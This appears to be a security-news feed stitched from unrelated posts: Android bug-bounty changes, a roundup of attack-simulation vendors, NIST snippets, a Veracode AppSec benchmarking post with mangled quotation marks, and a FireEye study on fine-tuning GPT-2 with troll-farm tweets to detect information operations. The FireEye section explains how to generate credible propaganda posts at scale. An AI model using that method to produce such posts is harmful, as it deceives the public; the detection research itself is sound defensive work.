wV8EGAEIAAkFAl10tjECGwwACgkQivAJ+Ayukvb0pw//ZMiWOeava3SfF1Tc
CV41hlqYXcDluGhMBHVQNHNKA7Y9fOpl7fO0W1GuIU6v7USwKyGg3UbJdh7l
vDcaUaAxhVL4NqLJURsVVKvaW6GkcFGCCtTjoFxvrDHRMQM1kJWZgPG7/ON6
MR0848tHMG/6gjvA5geJtOWPBaIBrkMRQBJ2bzhElTuhKIjTHPTxxs0VdmzV
SwHD+/SuWMEEXK6EOVRLUlTgPgPDS2MrR+m4ShG9Ec1gXz5EwJe3pre5QzB3
1x8BqQbwL/TwQCitxt+RrAqmliMAD7D5U5AIoi8vR9Xye1+zevrAvlbq+IkU
eCfr7H2LAMTYaXP5MBEtaKv3do1qP8Nl59FxjElT1zGOPz+sgejrjbHOEQRh
7Uk+TaTPtQkzoHmT1RUjWYycf5oJb8THOAid/PrgtJZkGTBiCOrSQghRP9CY
Z5/0DRODKXef5VwYveNtyCEb4BAS4wW7+xLXwkyoabjrcYB7GUDi2kyJOjZF
APujWl1sSAki6hyzorvLhJP56Ps/h21DAaLUoJgUQ+6c4P01grniniw2Ml0W
YEyp/GVyBw/aQPoDG4Lc6USSXEHj++Wd+ffxJ+K6aCroHcpPW4drKRVzxBL/
6XVguPc+UJ1egyP9oa9u0J5lGdBcE9mhRVhCNNujrcRhsvvgLL+Ca079PTCq
nuIgwms=
=WWrF
-----END PGP PUBLIC KEY BLOCK-----

Expanding the Android Security Rewards Program

The Android Security Rewards (ASR) program was created in 2015 to reward researchers who find and report security issues to help keep the Android ecosystem safe. Over the past 4 years, we have awarded over 1,800 reports, and paid out over four million dollars.

Today, we’re expanding the program and increasing reward amounts. We are introducing a top prize of $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. Additionally, we will be launching a specific program offering a 50% bonus for exploits found on specific developer preview versions of Android, meaning our top prize is now $1.5 million.

As mentioned in a previous blog post, in 2019 Gartner rated the Pixel 3 with Titan M as having the most “strong” ratings in the built-in security section out of all devices evaluated. This is why we’ve created a dedicated prize to reward researchers for exploits found to circumvent the secure elements protections.

In addition to exploits involving Pixel Titan M, we have added other categories of exploits to the rewards program, such as those involving data exfiltration and lockscreen bypass. These rewards go up to $500,000 depending on the exploit category. For full details, please refer to the Android Security Rewards Program Rules page.

Now that we’ve covered some of what’s new, let’s take a look back at some milestones from this year. Here are some highlights from 2019:

  • Total payouts in the last 12 months have been over $1.5 million.
  • Over 100 participating researchers have received an average reward amount of over $3,800 per finding (46% increase from last year). On average, this means we paid out over $15,000 (20% increase from last year) per researcher!
  • The top reward paid out in 2019 was $161,337.

Top Payout

The highest reward paid out to a member of the research community was for a report from Guang Gong (@oldfresher) of Alpha Lab, Qihoo 360 Technology Co. Ltd. This report detailed the first reported 1-click remote code execution exploit chain on the Pixel 3 device. Guang Gong was awarded $161,337 from the Android Security Rewards program and $40,000 by Chrome Rewards program for a total of $201,337. The $201,337 combined reward is also the highest reward for a single exploit chain across all Google VRP programs. The Chrome vulnerabilities leveraged in this report were fixed in Chrome 77.0.3865.75 and released in September, protecting users against this exploit chain.

We’d like to thank all of our researchers for contributing to the security of the Android ecosystem. If you’re interested in becoming a researcher, check out our Bughunter University for information on how to get started.

Starting today November 21, 2019 the new rewards take effect. Any reports that were submitted before November 21, 2019 will be rewarded based on the previously existing rewards table.

Happy bug hunting!

5 Exciting players in the Breach and Attack Simulation (BAS) Cyber Security Category

Breach and Attack Simulation is a new concept that helps organizations evaluate their security posture in a continuous, automated, and repeatable way. This approach allows for the identification of imminent threats, provides recommended actions, and produces valuable metrics about cyber-risk levels. Breach and attack simulation is a fast-growing segment within the cybersecurity space, and it provides significant advantages over traditional security evaluation methods, including penetration testing and vulnerability assessments.

Going over the players in this industry, it is clear that the BAS category includes a number of different approaches with the common target to provide the customer with a clear picture of its actual vulnerabilities and how to mitigate them.

CyberDB has handpicked in this blog a number of exciting and emerging vendors. These players are (in alphabetical order):

Those companies have a number of characteristics in common, including  a very fast time to market, successful management team and strong traction. In addition, all of them have managed to raise Series A or B funding over the last 16 months, ranging from $5M to $32M.

Other notable players range from incumbent to emerging players, such as Rapid7, Qualys, ThreatCare,  AttackIQ, GuardiCore,  SafeBreach, Verodin (acquired lately by FireEye) and WhiteHaX.

Gartner defines Breach & Attack Simulation (BAS) technologies as tools “that allow enterprises to continually and consistently simulate the full attack cycle (including insider threats, lateral movement, and data exfiltration) against enterprise infrastructure, using software agents, virtual machines, and other means”.

What makes BAS special, is its ability to provide continuous and consistent testing at limited risk and that it can be used to alert IT and business stakeholders about existing gaps in the security posture or validate that security infrastructure, configuration settings and detection/prevention technologies are operating as intended. BAS can also assist in validating if security operations and the SOC staff can detect specific attacks when used as a complement to the red team or penetration testing exercises.

CyberDB strongly recommends exploring embedding BAS technologies as part of the overall modern Cyber security technology stack.

 

 

 

 

Cymulate was founded by an elite team of former IDF intelligence officers who identified frustrating inefficiencies during their cyber security operations. From this came their mission to empower organizations worldwide and make advanced cyber security as simple and familiar as sending an e-mail. Since the company’s inception in 2016, Cymulate’s platform was given the recognition of “Cool Vendor” in Application and Data Security by Gartner in 2018 and has received dozens of industry awards to date. Today, Cymulate has offices in Israel, United States, United Kingdom, and Spain. The company has raised $11 million with backing from investors Vertex Ventures, Dell Technologies Capital, Susquehanna Growth Equity, and Eyal Gruner.

Cymulate is a SaaS-based breach and attack simulation platform that makes it simple to test, measure and optimize the effectiveness of your security controls any time, all the time. With just a few clicks, Cymulate challenges your security controls by initiating thousands of attack simulations, showing you exactly where you’re exposed and how to fix it—making security continuous, fast and part of every-day activities.

Fully automated and customizable, Cymulate challenges your security controls against the full attack kill chain with thousands of simulated threats, both common and novel. Testing both internal and external defenses, Cymulate shortens test cycles, provides 360° visibility and actionable reporting, and offers a continuous counter-breach assessment technology that empowers security leaders to take a proactive approach to their cyber stance, so they can stay one step ahead of attackers. Always.

With a Research Lab that keeps abreast of the very latest threats, Cymulate proactively challenges security controls against the full attack kill chain, allowing hyper-connected organizations to avert damage and stay safe.

Overtaking manual, periodic penetration testing and red teaming, breach and attack simulation is becoming the most effective method to prepare and predict  oncoming attacks. Security professionals realize that to cope with evolving attackers, a continuous and automated solution is essential to ensure optimal non-stop security

Cymulate is trusted by hundreds of companies worldwide, from small businesses to large enterprises, including leading banks and financial services. They share our vision—to make it easy for anyone to protect their company with the highest levels of security. Because the easier cybersecurity is, the more secure your company—and every company—will be.

Back

 

 

 

Established in 2015 with offices in Israel, Boston, London and Zurich, Pcysys delivers an automated network penetration testing platform that assesses and helps reduce corporate cybersecurity risks. Hundreds of security professionals and service providers around the world use Pcysys to perform continuous, machine-based penetration tests that improve their immunity against cyber-attacks across their organizational networks. With over 60 enterprise global customers across all industries, Pcysys is the fastest-growing cybersecurity startup in Israel.

The Problem – Missing Cyber Defense Validation

We believe that penetration testing, as it is known today, is becoming obsolete. Traditionally, penetration testing has been performed manually by service firms, deploying expensive labor to uncover hidden vulnerabilities and produce lengthy reports, with little transparency along the way. Professional services-based penetration testing is limited in scope, time-consuming and costly. It represents a point-in-time snapshot, and cannot comply with the need for continuous security validation within a dynamic IT environment.

PenTera™ – One-Click Penetration Testing

Requiring no agents or pre-installations, Pcysys’s PenTera™ platform uses an algorithm to scan and ethically penetrate the network with the latest hacking techniques, prioritizing remediation efforts with a threat-facing perspective. The platform enables organizations to focus their resources on the remediation of the vulnerabilities that take part in a damaging “kill chain” without the need to chase down thousands of vulnerabilities that cannot be truly exploited towards data theft, encryption or service disruption.

Benefits

  • Continual vigilance – the greatest benefit of employing the PenTera platform is the ability to continually validate your security from an attacker’s perspective and grow your cyber resilience over time. Pen-testing is turning to be a daily activity.
  • Reduce external testing costs – with PenTera, you can minimize cost and dependency on external risk validation providers. While in some cases an annual 3rd-party pen-test is still required for compliance reasons, it can be reduced in scope and spend.
  • Test against the latest threats – as the threat landscape evolves, it is crucial to incorporate the latest threats into your regular pen-testing practices. Your PenTera subscription assures you stay current.

 Differentiators

  •  Agentless – zero agent installations or network configurations.
  • Real Exploits, No Simulations – PenTera performs real-time ethical exploitations.
  • Automated – press ‘Play’ and get busy doing other things while the penetration test progresses.
  • Complete Attack Vector Visibility – every step in the attack vector is presented and reported in detail to explain the attack “kill chain”.

Back

 

 

Company

Found in 2014, Picus has more than 100 customers and has been backed by EarlyBird, Social Capital and ACT-VC. Headquartered in San Francisco, Picus has offices in London and Ankara to serve its global customer base.

Picus Security’s customers include leading mid-sized companies and enterprises, across LATAM, Europe, APAC and the Middle East regions.

Solution

Picus continuously validates your security operations to harden your defenses. Picus empowers organizations to identify imminent threats, take the most viable defense actions and help businesses understand cyber risks to make the right decisions.

Picus Security is one of the leading Breach and Attack Simulation (BAS) vendors featured in several Gartner reports such as BAS Market Report, Market Guide For Vulnerability Assessment and Hype Cycle for Threat Facing Technologies. Picus has recently been recognized as a Cool Vendor in Security and Risk Management, 2H19 by Gartner. Picus was distinguished as one of the top 10 innovative cyber startups by PwC and the most innovative Infosec Startup of the year by Cyber Defense Magazine.

 Unlike penetration testing methods, Picus validates the security effectiveness continuously and in a repeatable manner that is completely risk-free for production systems. This approach helps customers identify imminent threats, take action and get a continuous view of the actual risk. Picus customers also maximize ROI from existing security tools, get continuous metrics on

their security level and can demonstrate the positive impact of security investments to business.

Picus can provide measurable context about descriptions, behavior, and methods of adversaries by running an extensive set of cyber-threats and attack scenarios 24/7 basis and in production networks on its fully risk-free platform with false-positive free.  Picus constantly assess organizational readiness for adversarial actions and prioritize findings based on adversarial context and helps immediate actions for mitigation of imminent threats.

  1. in-depth, full coverage threat database with more than 7,600 real-world payloads that are updated daily, and adversary-based attack scenarios and techniques mapped to the MITRE ATT&ACK framework to cover web application attacks, exploitations, malware, data exfiltration and endpoint scenarios.
  2. housing more than 34,000 mitigation signatures and 10 security vendor partnerships so analysts can gain insight into the most viable defense actions in response to adversaries, with immediate mitigation validation.
  3. providing actionable remediation recommendations tailored to organizations and their defense stacks and focusing only on attacks with mitigation solutions.

Back

 

 

Randori’s mission is to build the world’s most authentic, automated attack platform, to help security teams “train how they fight”. Founded in 2018 by a former Carbon Black Executive and leading red teamers, Randori provides a SaaS platform to allow security teams of all maturity to spar against an authentic adversary. Customers are testing their incident response, identifying weaknesses (not just vulnerabilities), and as a result, producing justifiable ways to ask for further investment.

Randori is based in Waltham, MA with offices in Denver, CO. Known customers include Houghton Mifflin Harcourt, Greenhill & Co, Carbon Black, RapidDeploy, and ClickSoftware.

The Randori platform consists of two products, Recon and Attack.

Recon provides comprehensive attack surface management powered by black-box discovery. Customers can “see” how attackers perceive their company from the outside. This is especially useful for enterprise organizations with a changing network footprint, such as M&A, high seasonality, or undergoing cloud migration. Their approach differs from “internet-wide scan” methods, which can produce false-positives and are not actionable. Recon results are prioritized using a Target Temptation engine, which takes into account factors like known weaknesses, post-exploitation potential, and the cost of action by an attacker. Recon is available for free trial; a complimentary Recon report can be provided to any company over 1000 employees.

Attack provides authentic adversary emulation across all stages of the kill chain. Customers choose from objective-based runbooks that the platform will use to gain initial access, maintain persistence, and move laterally across the network. Risk is assessed across vulnerabilities, misconfigurations, and credentials—the same ways attackers breach companies. Attack is available to select early access partners and will broaden access in 2020.

The Randori differentiator is authenticity: to get started with their platform, only a single email address is needed to understand one’s attack surface and put it to the test. The platform seeks not to “validate existing controls” or “detection of MITRE ATT&CK techniques”, but help security teams train against a real adversary.

Back

 

 

 

XM Cyber, a multi-award-winning breach and attack simulation (BAS) leader, was founded in 2016 by top security executives from the elite Israeli intelligence sector. XM Cyber’s core team is comprised of highly skilled and experienced veterans from the Israeli Intelligence with expertise in both o?ensive and defensive cyber security.

Headquartered in the Tel Aviv metro area, XM Cyber has offices in the US, UK, Israel and Australia, with global customers including leading financial institutions, critical infrastructure organizations, healthcare, manufacturers, and more.

HaXM by XM Cyber is the first BAS platform to simulate, validate and remediate attackers’ paths to your critical assets 24×7. HaXM’s automated purple teaming aligns red and blue teams to provide the full realistic advanced persistent threat (APT) experience on one hand while delivering vital prioritized actionable remediation on the other. Addressing real user behavior and exploits, the full spectrum of scenarios is aligned to your organization’s own network to expose blind spots and is executed using the most up-to-date attack techniques safely, without affecting network availability and user experience.

By continuously challenging the organizational network with XM Cyber’s platform, organizations gain clear visibility of the cyber risks, and an efficient, data-driven actionable remediation plan aimed at the most burning issues to fix.

  • The HaXM simulation and remediation platform continuously exposes attack vectors, from breach point to any organizational critical asset so you always know the attack vectors to your crown jewels.
  • The continuous loop of automated red teaming is completed by ongoing and prioritized actionable remediation of security gaps, so you know how to focus your resources on the most critical issues.
  • The platform addresses real user behavior, poor IT hygiene and security exploits to expose the most critical blind spots so that you improve your IT hygiene and practices.

Even when an organization has deployed and configured modern security controls, applied patches and refined policies, there is a plethora of ways hackers can still infiltrate the system and compromise critical assets. XM Cyber is the only one to address the crucial question for enterprises: “are my critical assets really secure?” XM Cyber provides the only solution on the market that actually simulates a real APT hacker automatically and continuously.

By automating sophisticated hacking tools and techniques and running them internally, XM Cyber allows you to see the impact a breach would have on your actual environment. And you can remediate gaps and strengthen security for your organization’s “crown jewels”, including your customer data, financial records, intellectual capital and other digital assets.

Back

 

The post 5 Exciting players in the Breach and Attack Simulation (BAS) Cyber Security Category appeared first on CyberDB.

NIST Seeking Input on Updates to NICE Cybersecurity Workforce Framework

The National Initiative for Cybersecurity Education (NICE), led by the National Institute of Standards and Technology (NIST), is planning to update the NICE Cybersecurity Workforce Framework, NIST Special Publication 800-181. The public is invited to provide input by January 13, 2020, for consideration in the update. The list of topics below covers the major areas in which NIST is considering updates. Comments received by the deadline will be incorporated to the extent practicable. The resulting draft revision to the NICE Cybersecurity Workforce Framework (NICE Framework), once completed, also

Something new from the Technology Partnerships Office

Patenting NIST technologies serves as a gateway to the commercialization of NIST innovations. Patents promote NIST’s critical mission, “To promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life.” Quick and easy access to NIST patents increases the likelihood of forming partnerships and ultimately commercialization of NIST technology. Previously, access to NIST patent information was only available through the Federal Laboratories Consortium (FLC) website. The

Stem Cells and AI: Better Together

One day in the future when you need medical care, someone will examine you, diagnose the problem, remove some of your body’s healthy cells, and then use them to grow a cure for your ailment. The therapy will be personalized and especially attuned to you and your body, your genes, and the microbes that live in your gut. This is the dream of modern medical science in the field of “regenerative medicine.” There are many obstacles standing between this dream and its implementation in real life, however. One obstacle is complexity. Cells often differ so much from one another and differ in so many

Using Benchmarks to Make the Case for AppSec

In a recent Veracode webinar on the subject of making the business case for AppSec, Colin Domoney, DevSecOps consultant, introduced the idea of using benchmarking to rally the troops around your AppSec cause. He says, ???What you can do is you can show where your organization sits relative to other organizations and then your peers. If you're lagging, that's probably a good reason to further invest. If you're leading, perhaps you can use that opportunity to catch up on some of your more ambitious projects. We use benchmarking quite frequently. It's quite a useful task to undertake.???

Ultimately, the value of benchmarks is two-fold; you can see, as Colin says, ???where you???re lagging??? and use that data to make the case for more budget. But it also strengthens your ask by giving it priorities and a clear road map. For instance, you could say, ???we need more AppSec budget,??? but your argument is more powerful if you can say, ???OWASP???s maturity model recommends automating security testing,??? or ???most organizations in the retail industry are testing for security monthly.???

If you???re looking for some AppSec benchmarking data, we recommend considering the following:

OWASP???s OpenSAMM Maturity Model: OWASP???s Software Assurance Maturity Model (SAMM) is ???an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization. The resources provided by SAMM will aid in:

  • Evaluating an organization???s existing software security practices.
  • Building a balanced software security assurance program in well-defined iterations.
  • Demonstrating concrete improvements to a security assurance program.
  • Defining and measuring security-related activities throughout an organization.???

At the highest level, SAMM defines four critical business functions related to software development. Within each business function are three security practices, and within each practice there are three levels of maturity, each with related activities. For instance, under the Business Function ???Verification,??? there is a security practice called ???Implementation review,??? which has the following maturity levels:

  • Level one: ツ????Opportunistically finding basic code-level vulnerabilities and other high-risk security issues.???
  • Level two: ???Make implementation review during development more accurate and efficient through automation.???
  • Level three: ???Mandate comprehensive implementation review process to discover language-level and application-specific risks.???

The model also goes into detail on each of the security activities, the success metrics, and more. There is also a related ???How-To Guide??? and ???Quick Start Guide.???

Veracode???s Verified Program: We created Verified to both give customers a way to prove to their customers that security is a priority, but also to give customers a road map toward application security maturity, based on our own 10+ years experience of what good AppSec looks like. Want to see how you stack up against a mature program? Take a look at the requirements for the highest Verified tier ??? Verified Continuous level. If your program looks more like the Standard or Team levels, use that to make the case to grow your program with a clear roadmap of what is entailed in taking your program to the next level.

Veracode State of Software Security (SOSS) report: Our annual report offers some valuable benchmarking data for your AppSec program. Because we are a SaaS platform, we are able to aggregate all our scan data and look at trends across industries, geographies, and development processes.

You can use the SOSS report to benchmark your program against all organizations, those in your industry, or against those that are implementing practices that are improving the state of their software security. For instance, this year???s report found that 80 percent of applications don???t contain any high-severity flaws ??? how do you measure up? In addition, we found that those who are scanning the most (260+ times per year) have 5x less security debt and improve their median time to remediation by 72 percent. How often are you scanning?

You can also use the SOSS report to measure your program and progress against your peers in your industry. For example, this year, we found that most of the top 10 flaw categories show a lower prevalence among retailers compared to the cross-industry average. The exceptions to that rule are Credentials Management and, to a lesser extent, Code Injection. It???s possible these tie back to core functionality in retail applications ??? authenticating users and handling user input. If you???re in the retail industry, you???ve now got a solid starting point for vulnerability types to focus on. If you???re in the Government and Education sector, your peers are struggling with Cross-Site Scripting flaws, are you? And finally, those in the financial sector, have the best fix rate among all industries at 76 percent ??? does your fix rate compare favorably?

Learn more

To find out more about making the case for AppSec, check out our new guide, Building a Business Case for Expanding Your AppSec Program.

Attention is All They Need: Combatting Social Media Information Operations With Neural Language Models

Information operations have flourished on social media in part because they can be conducted cheaply, are relatively low risk, have immediate global reach, and can exploit the type of viral amplification incentivized by platforms. Using networks of coordinated accounts, social media-driven information operations disseminate and amplify content designed to promote specific political narratives, manipulate public opinion, foment discord, or achieve strategic ideological or geopolitical objectives. FireEye’s recent public reporting illustrates the continually evolving use of social media as a vehicle for this activity, highlighting information operations supporting Iranian political interests such as one that leveraged a network of inauthentic news sites and social media accounts and another that impersonated real individuals and leveraged legitimate news outlets.

Identifying sophisticated activity of this nature often requires the subject matter expertise of human analysts. After all, such content is purposefully and convincingly manufactured to imitate authentic online activity, making it difficult for casual observers to properly verify. The actors behind such operations are not transparent about their affiliations, often undertaking concerted efforts to mask their origins through elaborate false personas and the adoption of other operational security measures. With these operations being intentionally designed to deceive humans, can we turn towards automation to help us understand and detect this growing threat? Can we make it easier for analysts to discover and investigate this activity despite the heterogeneity, high traffic, and sheer scale of social media?

In this blog post, we will illustrate an example of how the FireEye Data Science (FDS) team works together with FireEye’s Information Operations Analysis team to better understand and detect social media information operations using neural language models.

Highlights

  • A new breed of deep neural networks uses an attention mechanism to home in on patterns within text, allowing us to better analyze the linguistic fingerprints and semantic stylings of information operations using modern Transformer models.
  • By fine-tuning an open source Transformer known as GPT-2, we can detect social media posts being leveraged in information operations despite their syntactic differences to the model’s original training data.
  • Transfer learning from pre-trained neural language models lowers the barrier to entry for generating high-quality synthetic text at scale, and this has implications for the future of both red and blue team operations as such models become increasingly commoditized.

Background: Using GPT-2 for Transfer Learning

OpenAI’s updated Generative Pre-trained Transformer (GPT-2) is an open source deep neural network that was trained in an unsupervised manner on the causal language modeling task. The objective of this language modeling task is to predict the next word in a sentence from previous context, meaning that a trained model ends up being capable of language generation. If the model can predict the next word accurately, it can be used in turn to predict the following word, and then so on and so forth until eventually, the model produces fully coherent sentences and paragraphs. Figure 1 depicts an example of language model (LM) predictions we generated using GPT-2. To generate text, single words are successively sampled from distributions of candidate words predicted by the model until it predicts an <|endoftext|> word, which signals the end of the generation.


Figure 1: An example GPT-2 generation prior to fine-tuning after priming the model with the phrase “It’s disgraceful that.”  

The quality of this synthetically generated text along with GPT-2’s state of the art accuracy on a host of other natural language processing (NLP) benchmark tasks is due in large part to the model’s improvements over prior 1) neural network architectures and 2) approaches to representing text. GPT-2 uses an attention mechanism to selectively focus the model on relevant pieces of text sequences and identify relationships between positionally distant words. In terms of architectures, Transformers use attention to decrease the time required to train on enormous datasets; they also tend to model lengthy text and scale better than other competing feedforward and recurrent neural networks. In terms of representing text, word embeddings were a popular way to initialize just the first layer of neural networks, but such shallow representations required being trained from scratch for each new NLP task and in order to deal with new vocabulary. GPT-2 instead pre-trains all the model’s layers using hierarchical representations, which better capture language semantics and are readily transferable to other NLP tasks and new vocabulary.

This transfer learning method is advantageous because it allows us to avoid starting from scratch for each and every new NLP task. In transfer learning, we start from a large generic model that has been pre-trained for an initial task where copious data is available. We then leverage the model’s acquired knowledge to train it further on a different, smaller dataset so that it excels at a subsequent, related task. This process of training the model further is referred to as fine-tuning, which involves re-learning portions of the model by adjusting its underlying parameters. Fine-tuning not only requires less data compared to training from scratch, but typically also requires less compute time and resources.

In this blog post, we will show how to perform transfer learning from a pre-trained GPT-2 model in order to better understand and detect information operations on social media. Transformers have shown that Attention is All You Need, but here we will also show that Attention is All They Need: while transfer learning may allow us to more easily detect information operations activity, it likewise lowers the barrier to entry for actors seeking to engage in this activity at scale.

Understanding Information Operations Activity Using Fine-Tuned Neural Generations

In order to study the thematic and linguistic characteristics of a common type of social media-driven information operations activity, we first fine-tuned an LM that could perform text generation. Since the pre-trained GPT-2 model's dataset consisted of 40+ GB of Internet text data extracted from 8+ million reputable web pages, its generations display relatively formal grammar, punctuation, and structure that corresponds to the text present within that original dataset (e.g. Figure 1). To make it appear like social media posts with their shorter length, informal grammar, erratic punctuation, and syntactic quirks including @mentions, #hashtags, emojis, acronyms, and abbreviations, we fine-tuned the pre-trained GPT-2 model on a new language modeling task using additional training data.

For the set of experiments presented in this blog post, this additional training data was obtained from the following open source datasets of identified accounts operated by Russia’s famed Internet Research Agency (IRA) “troll factory”:

  • NBCNews, over 200,000 tweets posted between 2014 and 2017 tied to IRA “malicious activity.”
  • FiveThirtyEight, over 1.8 million tweets associated with IRA activity between 2012 and 2018; we used accounts categorized as Left Troll, Right Troll, or Fearmonger.
  • Twitter Elections Integrity, almost 3 million tweets that were part of the influence effort by the IRA around the 2016 U.S. presidential election.
  • Reddit Suspicious Accounts, consisting of comments and submissions emanating from 944 accounts of suspected IRA origin.

After combining these four datasets, we sampled English-language social media posts from them to use as input for our fine-tuned LM. Fine-tuning experiments were carried out in PyTorch using the 355 million parameter pre-trained GPT-2 model from HuggingFace’s transformers library, and were distributed over up to 8 GPUs.

As opposed to other pre-trained LMs, GPT-2 conveniently requires minimal architectural changes and parameter updates in order to be fine-tuned on new downstream tasks. We simply processed social media posts from the above datasets through the pre-trained model, whose activations were then fed through adjustable weights into a linear output layer. The fine-tuning objective here was the same that GPT-2 was originally trained on (i.e. the language modeling task of predicting the next word, see Figure 1), except now its training dataset included text from social media posts. We also added the <|endoftext|> string as a suffix to each post to adapt the model to the shorter length of social media text, meaning posts were fed into the model according to:

“#Fukushima2015 Zaporozhia NPP can explode at any time
and that's awful! OMG! No way! #Nukraine<|endoftext|>”

Figure 2 depicts a few example generations made after fine-tuning GPT-2 on the IRA datasets. Observe how these text generations are formatted like something we might expect to encounter scrolling through social media – they are short yet biting, express certainty and outrage regarding political issues, and contain emphases like an exclamation point. They also contain idiosyncrasies like hashtags and emojis that positionally manifest at the end of the generated text, depicting a semantic style regularly exhibited by actual users.


Figure 2: Fine-tuning GPT-2 using the IRA datasets for the language modeling task. Example generations are primed with the same phrase from Figure 1, “It’s disgraceful that.” Hyphens are added for readability and not produced by the model.

How does the model produce such credible generations? Besides the weights that were adjusted during LM fine-tuning, some of the heavy lifting is also done by the underlying attention scores that were learned by GPT-2’s Transformer. Attention scores are computed between all words in a text sequence, and represent how important one word is when determining how important its nearby words will be in the next learning iteration. To compute attention scores, the Transformer performs a dot product between a Query vector q and a Key vector k:

  • q encodes the current hidden state, representing the word that searches for other words in the sequence to pay attention to that may help supply context for it.
  • k encodes the previous hidden states, representing the other words that receive attention from the query word and might contribute a better representation for it in its current context.

Figure 3 displays how this dot product is computed based on single neuron activations in q and k using an attention visualization tool called bertviz. Columns in Figure 3 trace the computation of attention scores from the highlighted word on the left, “America,” to the complete sequence of words on the right. For example, to decide to predict “#” following the word “America,” this part of the model focuses its attention on preceding words like “ban,” “Immigrants,” and “disgrace,” (note that the model has broken “Immigrants” into “Imm” and “igrants” because “Immigrants” is an uncommon word relative to its component word pieces within pre-trained GPT-2's original training dataset).  The element-wise product shows how individual elements in q and k contribute to the dot product, which encodes the relationship between each word and every other context-providing word as the network learns from new text sequences. The dot product is finally normalized by a softmax function that outputs attention scores to be fed into the next layer of the neural network.


Figure 3: The attention patterns for the query word highlighted in grey from one of the fine-tuned GPT-2 generations in Figure 2. Individual vertical bars represent neuron activations, horizontal bars represent vectors, and lines represent the strength of attention between words. Blue indicates positive values, red indicates negative values, and color intensity represents the magnitude of these values.

Syntactic relationships between words like “America,” “ban,” and “Immigrants“ are valuable from an analysis point of view because they can help identify an information operation’s interrelated keywords and phrases. These indicators can be used to pivot between suspect social media accounts based on shared lexical patterns, help identify common narratives, and even to perform more proactive threat hunting. While the above example only scratches the surface of this complex, 355 million parameter model, qualitatively visualizing attention to understand the information learned by Transformers can help provide analysts insights into linguistic patterns being deployed as part of broader information operations activity.

Detecting Information Operations Activity by Fine-Tuning GPT-2 for Classification

In order to further support FireEye Threat Analysts’ work in discovering and triaging information operations activity on social media, we next fine-tuned a detection model to perform classification. Just like when we adapted GPT-2 for a new language modeling task in the previous section, we did not need to make any drastic architectural changes or parameter updates to fine-tune the model for the classification task. However, we did need to provide the model with a labeled dataset, so we grouped together social media posts based on whether they were leveraged in information operations (class label CLS = 1) or were benign (CLS = 0).

Benign, English-language posts were gathered from verified social media accounts, which generally corresponded to public figures and other prominent individuals or organizations whose posts contained diverse, innocuous content. For the purposes of this blog post, information operations-related posts were obtained from the previously mentioned open source IRA datasets. For the classification task, we separated the IRA datasets that were previously combined for LM fine-tuning, and selected posts from only one of them for the group associated with CLS = 1. To perform dataset selection quantitatively, we fine-tuned LMs on each IRA dataset to produce three different LMs while keeping 33% of the posts from each dataset held out as test data. Doing so allowed us to quantify the overlap between the individual IRA datasets based on how well one dataset’s LM was able to predict post content originating from the other datasets.


Figure 4: Confusion matrix representing perplexities of the LMs on their test datasets. The LM corresponding to the GPT-2 row was not fine-tuned; it corresponds to the pretrained GPT-2 model with reported perplexity of 18.3 on its own test set, which was unavailable for evaluation using the LMs. The Reddit dataset was excluded due to the low volume of samples.

In Figure 4, we show the result of computing perplexity scores for each of the three LMs and the original pre-trained GPT-2 model on held out test data from each dataset. Lower scores indicate better perplexity, which captures the probability of the model choosing the correct next word. The lowest scores fell along the main diagonal of the perplexity confusion matrix, meaning that the fine-tuned LMs were best at predicting the next word on test data originating from within their own datasets. The LM fine-tuned on Twitter’s Elections Integrity dataset displayed the lowest perplexity scores when averaged across all held out test datasets, so we selected posts sampled from this dataset to demonstrate classification fine-tuning.


Figure 5: (A) Training loss histories during GPT-2 fine-tuning for the classification (red) and LM (grey, inset) tasks. (B) ROC curve (red) evaluated on the held out fine-tuning test set, contrasted with random guess (grey dotted).

To fine-tune for the classification task, we once again processed the selected dataset’s posts through the pre-trained GPT-2 model. This time, activations were fed through adjustable weights into two linear output layers instead of just the single one used for the language modeling task in the previous section. Here, fine-tuning was formulated as a multi-task objective with classification loss together with an auxiliary LM loss, which helped accelerate convergence during training and improved the generalization of the model. We also prepended posts with a new [BOS] (i.e. Beginning Of Sentence) string and suffixed posts with the previously mentioned [CLS] class label string, so that each post was fed into the model according to:

“[BOS]Kevin Mandia was on @CNBC’s @MadMoneyOnCNBC with @jimcramer discussing targeted disinformation heading into the… https://t.co/l2xKQJsuwk[CLS]”

The [BOS] string played a similar delimiting role to the <|endoftext|> string used previously in LM fine-tuning, and the [CLS] string encoded the hidden state ∈ {0, 1} that was the label fed to the model’s classification layer. The example social media post above came from the benign dataset, so this sample’s label was set to CLS = 0 during fine-tuning. Figure 5A shows the evolution of classification and auxiliary LM losses during fine-tuning, and Figure 5B displays the ROC curve for the fine-tuned classifier on its test set consisting of around 66,000 social media posts. The convergence of the losses to low values, together with a high Area Under the ROC Curve (i.e. AUC), illustrates that transfer learning allowed this model to accurately detect social media posts associated with IRA information operations activity versus benign ones. Taken together, these metrics indicate that the fine-tuned classifier should generalize well to newly ingested social media posts, providing analysts a capability they can use to separate signal from noise.

Conclusion

In this blog post, we demonstrated how to fine-tune a neural LM on open source datasets containing social media posts previously leveraged in information operations. Transfer learning allowed us to classify these posts with a high AUC score, and FireEye’s Threat Analysts can utilize this detection capability in order to discover and triage similar emergent operations. Additionally, we showed how Transformer models assign scores to different pieces of text via an attention mechanism. This visualization can be used by analysts to tease apart adversary tradecraft based on posts’ linguistic fingerprints and semantic stylings.

Transfer learning also allowed us to generate credible synthetic text with low perplexity scores. One of the barriers actors face when devising effective information operations is adequately capturing the nuances and context of the cultural climate in which their targets are situated. Our exercise here suggests this costly step could be bypassed using pre-trained LMs, whose generations can be fine-tuned to embody the zeitgeist of social media. GPT-2’s authors and subsequent researchers have warned about potential malicious use cases enabled by this powerful natural language generation technology, and while it was conducted here for a defensive application in a controlled offline setting using readily available open source data, our research reinforces this concern. As trends towards more powerful and readily available language generation models continue, it is important to redouble efforts towards detection as demonstrated by Figure 5 and other promising approaches such as Grover.

This research was conducted during a three-month FireEye IGNITE University Program summer internship, and represents a collaboration between the FDS and FireEye Threat Intelligence’s Information Operations Analysis teams. If you are interested in working on multidisciplinary projects at the intersection of cyber security and machine learning, please consider applying to one of our 2020 summer internships.

How to Leverage YAML to Integrate Veracode Solutions Into CI/CD Pipelines

